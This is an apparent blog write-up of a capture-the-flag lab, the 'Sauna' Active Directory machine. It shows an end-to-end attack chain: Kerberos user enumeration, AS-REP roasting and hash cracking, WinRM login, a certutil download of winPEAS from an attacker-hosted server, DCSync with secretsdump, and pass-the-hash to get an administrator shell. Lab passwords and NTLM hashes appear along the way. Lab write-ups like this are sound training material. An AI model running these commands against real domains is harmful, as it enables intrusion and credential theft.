Port 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,&amp;lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;Using KDC&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;10.129.95.180:88
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:32:09 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:35:45 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       hsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:36:30 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:38:47 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       fsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:58:42 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Fsmith@egotistical-bank.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We found 3 users.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AES-ROASTING&lt;/strong&gt;&lt;br&gt;
For these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt; GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt;krb5asrep&lt;span class="nv"&gt;$23$fsmith&lt;/span&gt;@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3&lt;span class="nv"&gt;$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got fsmith’s hash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cracking the hash&lt;/strong&gt;&lt;br&gt;
Hashcat help us to crack this hash.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force&lt;br&gt;
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23&lt;/code&gt;&lt;br&gt;
We found fsmith’s password.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gaining access to evil-winrm | PORT 5985&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.129.95.180&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;fsmith&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thestrokes23&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v3.9&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="n"&gt;Info:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Establishing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;remote&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;endpoint&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Desktop&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="w"&gt;


    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="w"&gt;


&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nt"&gt;-ar&lt;/span&gt;&lt;span class="o"&gt;---&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="n"&gt;/3/2026&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="nx"&gt;5:14&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PM&lt;/span&gt;&lt;span class="w"&gt;             &lt;/span&gt;&lt;span class="nx"&gt;34&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*******&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got user.txt in desktop directory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt;&lt;br&gt;
Firstly,we should upload winpeas on the victim machine for privilege escalation methods.&lt;/p&gt;

&lt;p&gt;On attacker machine&lt;/p&gt;

&lt;p&gt;Make sure you are supposed to be in directory which has winpeas inside.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -m http.server 80&lt;/code&gt;&lt;br&gt;
On victim machine&lt;/p&gt;

&lt;p&gt;&lt;code&gt;certutil -urlcache -split -f http://&amp;lt;ATTACKER_IP&amp;gt;:80/winPEAS.exe winPEAS.exe&lt;/code&gt;&lt;br&gt;
We can run winpeas with .\winpeas.exe&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And there it is autologon user:svc_loanmanager&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;BloodHound&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Take a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.&lt;/p&gt;

&lt;p&gt;We use secretsdump for administrator hash.&lt;/p&gt;

&lt;p&gt;`&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;console&lt;br&gt;
&lt;/code&gt;console&lt;br&gt;
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!&lt;a class="mentioned-user" href="https://dev.to/10"&gt;@10&lt;/a&gt;.129.95.180'&lt;br&gt;
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See &lt;a href="https://setuptools.pypa.io/en/latest/pkg_resources.html" rel="noopener noreferrer"&gt;https://setuptools.pypa.io/en/latest/pkg_resources.html&lt;/a&gt;&lt;br&gt;
  &lt;strong&gt;import&lt;/strong&gt;('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')&lt;br&gt;
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies &lt;/p&gt;

&lt;p&gt;[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied &lt;br&gt;
[&lt;em&gt;] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)&lt;br&gt;
[&lt;/em&gt;] Using the DRSUAPI method to get NTDS.DIT secrets&lt;br&gt;
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::&lt;br&gt;
`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;br&gt;
Hash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e &lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)&lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)&lt;br&gt;
&lt;/code&gt;Yeppp, we can use this hash for login!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ROOT FLAG&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&amp;gt;&lt;/code&gt;impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 &lt;a href="mailto:Administrator@10.129.95.180"&gt;Administrator@10.129.95.180&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;C:\Users&amp;gt; cd Administrator&lt;/p&gt;

&lt;p&gt;C:\Users\Administrator&amp;gt; cd Desktop&lt;/p&gt;

&lt;p&gt;C:\Users\Administrator\Desktop&amp;gt; dir&lt;br&gt;
 Volume in drive C has no label.&lt;br&gt;
 Volume Serial Number is 489C-D8FC&lt;br&gt;
 Directory of C:\Users\Administrator\Desktop&lt;br&gt;
07/14/2021  03:35 PM    &lt;/p&gt;          .&lt;br&gt;
07/14/2021  03:35 PM              ..&lt;br&gt;
07/03/2026  05:14 PM                34 root.txt&lt;br&gt;
               1 File(s)             34 bytes&lt;br&gt;
               2 Dir(s)   7,812,263,936 bytes free&lt;br&gt;
C:\Users\Administrator\Desktop&amp;gt; type root.txt&lt;br&gt;
*********``&lt;br&gt;
BINGOOO!!!! We got root flag. Stay safe and goodbye.
&lt;/blockquote&gt;

</description>
      <category>ctf</category>
      <category>redteam</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
